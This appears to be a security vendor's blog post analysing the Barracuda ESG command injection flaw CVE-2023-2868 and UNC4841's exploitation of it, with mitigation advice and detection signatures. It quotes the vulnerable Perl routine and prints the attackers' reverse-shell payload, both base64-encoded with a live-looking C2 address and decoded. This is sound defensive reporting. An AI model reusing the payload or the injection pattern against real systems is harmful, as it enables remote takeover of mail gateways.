CVE-2023-2868: Barracuda ESG Vulnerability Actively Exploited by UNC4841

The Red Report 2023

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On July 28th, 2023, The Cybersecurity and Infrastructure Security Agence (CISA) released a security alert on a critical  remote command injection vulnerability found in Barracuda Email Security Gateway (ESG) [1]. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical) and has been exploited by the Chinese cyber threat group UNC4841 since October 2022.

In this blog, we explained how the Barracuda CVE-2023-2868 exploit works and the malware used by UNC4841.

Simulate Malware Attacks with 14-Day Free Trial of Picus Platform

What is Barracuda CVE-2023-2868 Command Injection Vulnerability?

Barracuda Email Security Gateway (ESG) is a security solution that investigates inbound and outbound email traffic for email-borne threats and data leaks. In May 2023, Barracuda disclosed that they found and patched a critical remote command injection vulnerability found in Barracuda ESG. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical), and the earliest evidence shows that it has been exploited since October 2022. Barracuda estimates that 5% of their 11000 devices worldwide are impacted.

Barracuda ESG versions from 5.1.3.001 to 9.2.0.006 are impacted. For mitigation, Barracuda urges users to isolate and replace impacted Barracuda ESG products. Users are recommended to rotate any credentials connected to the ESG appliance. To replace hardware versions of Barracuda ESG, Barracuda issued an RMA guidance.

How Does the Barracuda ESG CVE-2023-2868 Exploit Work?

CVE-2023-2868 is a command injection vulnerability that can be abused by adversaries to execute arbitrary commands remotely. The root cause of the vulnerability is an issue found in parsing logic for processing TAR files. Barracuda ESG uses the following Perl routine to execute the tarexec command as a system function. Since Barracuda ESG does not sanitize the user-controlled "$f" variable, adversaries were able to craft TAR files that allowed them to execute system commands with the ESG's privileges [2].

qx{$tarexec -O -xf $tempdir/parts/$part '$f'};

Example 1: Vulnerable Perl routine in Barracuda ESG

Initially, Barracuda released a patch to address the vulnerability on May 23rd, 2023. However, adversaries were able to circumvent the patch and continued to exploit the CVE-2023-2868 vulnerability. On May 31st, 2023, Barracuda advised their customers to isolate and replace impacted ESG products, regardless of patch level.

Chinese APT Group UNC4841

UNC4841 is a cyber espionage group, and their campaigns are mostly conducted in support of the Chinese government. Nearly half of the target organizations are located in the Americas, and a third of them are governmental organizations. Individuals working for a government or a research institute are also targeted as they are likely to be privy to political or strategic information. 

As an initial access vector, UNC4841 sends emails with malicious files crafted to exploit the CVE-2023-2868 vulnerability to victim organizations. The file extension of the malicious file can be TAR, JPG, or DAT. After the mail is delivered, the crafted malicious file exploits the CVE-2023-2868 vulnerability and executes a reverse shell payload.

Obfuscated payload

c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjE0OS4xNTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=


Deobfuscated payload

setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect <UNC4841_C2_Server> >/tmp/p 2>/dev/null;rm /tmp/p"

Example 2: Reverse Shell Payload used by UNC4841

How Picus Helps Simulate Barracuda ESG CVE-2023-2868 RCE Attacks?

We also strongly suggest simulating Barracuda ESG CVE-2023-2868 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus The Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, ProxyNotShell, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Barracuda ESG CVE-2023-2868 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

74165

WHIRLPOOL Backdoor Malware Download Threat

Network Infiltration

34162

WHIRLPOOL Backdoor Malware Email Threat

Email Infiltration

47061

SEASPY Backdoor Malware Download Threat

Network Infiltration

74675

SEASPY Backdoor Malware Email Threat

Email Infiltration

26107

Barracuda CVE-2023-2868 Remote Command Injection Vulnerability Download Threat

Network Infiltration

51027

Barracuda CVE-2023-2868 Remote Command Injection Vulnerability Email Threat

Email Infiltration (Phishing)

Moreover, Picus Threat Library contains 300+ threats containing 3000+ web application and vulnerability exploitation attacks in addition to 1500+ endpoint, 8000+ malware, email and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2023-2868 vulnerability exploitation attacks and related malware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for CVE-2023-2868 vulnerability exploitation attacks:

Security Control

Signature ID

Signature Name

Check Point NGFW

0BB29FE1D

Backdoor.Linux.Barracuda.TC.ac43pCBn

Check Point NGFW

0C688486B

Backdoor.Linux.Barracuda.TC.cc22culd

Check Point NGFW

0A44B817D

Backdoor.Linux.Barracuda.TC.1089EgCP

Cisco FirePower

1.61918.2

SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt

Forcepoint NGFW

 

File_Malware-Blocked 

Fortigate AV

10142373

Linux/Barr.CUDA!tr

Snort

1.61918.2

SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt

Snort

1.61920.2

SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt

Tippingpoint

42865

TCP: Barracuda Email Security Gateway Command Injection Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of Picus The Complete Security Validation Platform.

References

[1] "CISA Releases Malware Analysis Reports on Barracuda Backdoors," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors. [Accessed: Jul. 31, 2023]

[2] "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China," Mandiant, Oct. 03, 2021. Available: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally. [Accessed: Jul. 31, 2023]